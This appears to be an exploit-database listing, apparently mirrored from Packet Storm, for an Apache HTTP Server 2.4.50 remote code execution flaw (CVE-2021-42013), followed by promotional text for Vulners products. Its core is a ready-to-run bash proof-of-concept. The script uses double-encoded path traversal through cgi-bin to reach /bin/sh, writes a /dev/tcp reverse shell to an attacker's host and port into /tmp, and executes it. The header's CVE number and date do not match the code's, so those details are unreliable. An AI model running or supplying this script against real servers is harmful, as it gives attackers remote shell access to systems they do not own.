Lucene search
K

Apache HTTP Server 2.4.50 Remote Code Execution

🗓️ 24 Oct 2021 00:00:00Reported by thelastvvvType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 629 Views

Apache HTTP Server 2.4.50 Remote Code Execution (RCE) CVE-2021-4201

Related
Code
`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)  
# Credits: Ash Daulton & cPanel Security Team  
# Date: 24/07/2021  
# Exploit Author: TheLastVvV.com  
# Vendor Homepage: https://apache.org/  
# Version: Apache 2.4.50 with CGI enable  
# Tested on : Debian 5.10.28  
# CVE : CVE-2021-42013  
  
#!/bin/bash  
  
echo 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'  
if [ $# -eq 0 ]  
then  
echo "try: ./$0 http://ip:port LHOST LPORT"  
exit 1  
fi  
curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh" && curl "$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh"  
  
#usage chmod -x CVE-2021-42013.sh  
#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation